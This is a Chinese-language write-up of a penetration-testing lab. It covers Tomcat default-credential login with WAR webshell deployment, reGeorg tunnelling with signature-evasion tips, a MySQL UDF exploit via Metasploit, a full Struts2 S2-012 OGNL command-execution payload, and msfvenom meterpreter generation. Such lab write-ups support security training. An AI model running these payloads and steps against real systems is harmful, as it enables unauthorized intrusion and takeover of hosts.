前两天朋友分享了一个实验靶场,感觉环境还不错,于是对测试过程进行了详细记录,靶场中涉及知识点总结如下:
- War包制作
- regeorg内网代理工具的使用
- UDF漏洞利用
- Struts2-012漏洞利用
- Msfvenom模块的使用
本次实验靶场的网络拓扑结构如下图所示:
01
获取web据点
首先访问朋友给定的web服务器端口,为tomcat应用的默认页面,如下图所示:
如果刚开始没有思路的话,可以百度搜索一下Tomcat示例页面相关漏洞情况。访问目标manager后台目录,尝试tomcat默认口令tomcat/tomcat进行登录:
登录成功之后,tomcat管理后台有个部署war包的功能,可以通过上传war包getshell,获取服务器权限。
在攻击机kali中生成war包后门,可以用自己的木马,也可使用kali自带webshell,默认路径:/usr/share/laudanum/
jar cvf shell.war xx.jsp
在WAR file to deploy 功能处上传并部署后门war包,单击选择文件,选择生成的war文件并确定,点击击deploy按钮就完成了上传。验证是否上传成功,浏览器访问注意事项:根目录+war包文件名+jsp webshell文件名比如我上传了的war包名为cmd.war,木马名为:cmd.jsp在浏览器地址栏中:hxxp://x.x.x.x/cmd/cmd.jsp
接下是连接上传的jsp一句话,使用C刀连接目标服务器的jsp木马下载地址:https://github.com/Chora10/Cknife 可自行编译或者下载网上的程序虚拟机里执行。
菜刀成功连接后,会以树状形式显示webshell文件所处位置,如下图所示
02
添加代理
拿下web边界机以后,一般情况下,分两种情况:
- 有内网:以此为跳板,攻击内网其他机器,摸清目标内网拓扑环境,拿下靶标系统;
- 无内网:如果是项目,就可以收工了,不是的话,就可以作为代理池的一部分;
下面的情况属于有内网的环境,查看本机IP地址,发现两个网卡都有内网地址。
目标web服务器并无探测主机存活的工具,两种方式:
- 自己上传端口扫描工具||脚本
- 使用隧道代理工具,代理自己的工具进入目标内网中,做初步的信息搜集。
此处选择第二种方式,上传regeorg程序的tunnel.jsp脚本到目标服务器的shell目录下
web访问返回连接成功的信息(Georg says,’All seems fine’) 如下图所示,此为该工具流量硬特征,建议在下载后修改该字符串,或者使用升级版的neo-regeorg
https://github.com/L-codes/Neo-reGeorg 去特征且传输加密
使用regeorg工具建立隧道,命令如下:
Python regeorgsocksproxy.py -u hxxp://x.x.x.x/tunnel.jsp -p xxxx
-u 代理木马链接;
-p指定传输端口;
在proxychains工具配置文件下添加regeorg打通的代理端口vim /etc/proxychains.conf 在最后一行添加regeorg的配置好的传输端口即可
代理nmap到内网扫描172网段敏感端口,使用TCP全连接扫描一些Nmap使用语法:http://mang0.me/archis/40a439a4/
03
UDF漏洞利用
通过扫描得到的MySQL应用信息,尝试弱口令连接,一样的思路哪个应用不会搜索哪里
查看security_file_priv是否配置命令:
show variables like '%secure%';
显示结果对应解释
Secure_file_priv=null //不允许导入导出文件Secure_file_priv='D:/' //允许导入到指定目录Secure_file_priv=‘’ //允许到任意目录Secure_file_priv=”/” //允许到根目录
发现为空可以写任意目录,使用proxychains将msf代理到目标内网中,利用MySQL的UDF漏洞进行命令执行。
如果忘记模块,可以先search 需要的模块内容关键字
Use exploit/multi/mysql/mysql_udf_payload
查看未设置的参数 show options
Password和rhost参数可以设置
Set rhost 172.16.15.16Set password 123456 run
虽然显示没有会话,但是so文件已经传上去了,使用默认的MySQL命令连接,执行自定义函数,成功执行,说明udf提权成功。
04
S2-012漏洞利用
代理nmap到内网扫描10网段机器敏感端口
发现10.10.60.250:8080存在struts2-012漏洞
Struts2-012 payload 测试
%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","-al"})).redirectErrorStream(true).start(), #b=#a.getInputStream(), #c=new java.io.InputStreamReader(#b), #d=new java.io.BufferedReader(#c), #e=new char[50000], #d.read(#e), #f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }
成功读取/etc/passwd文件
10.10.60.66和172.16.15.16一样的思路。
弱口令:admin/password
上传菜刀的jsp木马
使用蚁剑服务器管理工具连接成功
Msf生成Linux木马
msfvenom -p linux/x86/meterpreter/bind_tcp rhost=10.10.60.66 lport=1234 -f elf > shell.elf
生成完成后将该木马程序上传到目标服务器的web目录下,赋予权限,在msf中开启监听模块,执行程序,即可拿到会话设置msf下handler模块必要的参数
set payload linux/x86/meterpreter/bing_tcpSet rhost 10.10.60.66Set lport 1234
exploit -j 后台获取会话Sessions 可查看会话 -i 进入该会话
本次实验到此结束,通过弱口令并结合应用特性拿到主机权限,使用内网代理工具建立隧道,探测内网段端口及对应漏洞,拿下对应主机权限。最后如果觉得对自己有帮忙的,关注一手,谢谢师傅们阅读。
- END -